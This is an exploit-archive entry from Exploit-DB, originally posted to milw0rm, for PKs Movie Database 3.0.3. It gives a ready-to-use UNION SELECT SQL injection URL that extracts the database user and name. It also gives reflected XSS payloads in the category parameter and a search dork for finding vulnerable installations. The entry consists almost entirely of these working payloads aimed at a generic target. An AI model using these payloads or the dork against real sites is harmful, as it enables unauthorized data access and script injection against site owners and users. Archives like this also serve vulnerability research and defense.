exploit-db-mirror/exploits/php/webapps/5095.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

24 lines
No EOL
908 B
Text

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------
= Author : HouSSaMix From H-T Team
= Script : PKs Movie Database version 3.0.3
= Original advisory : https://www.securityfocus.com/bid/27713/
= BUG 1 : Remote SQL Injection Vulnerability
exploit => www.target.com/path/index.php?num=-1%20union%20select%201,2,3,4,5,6,user(),database(),9,10,11,12,13,14,15,16,17,18,19,20
= BUG 2 : XSS
exploit => www.target.com/path/index.php?category=[XSS]
www.target.com/path/index.php?num=9999999999&category=[XSS]
example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
= Dork : "PKs Movie Database"
# milw0rm.com [2008-02-10]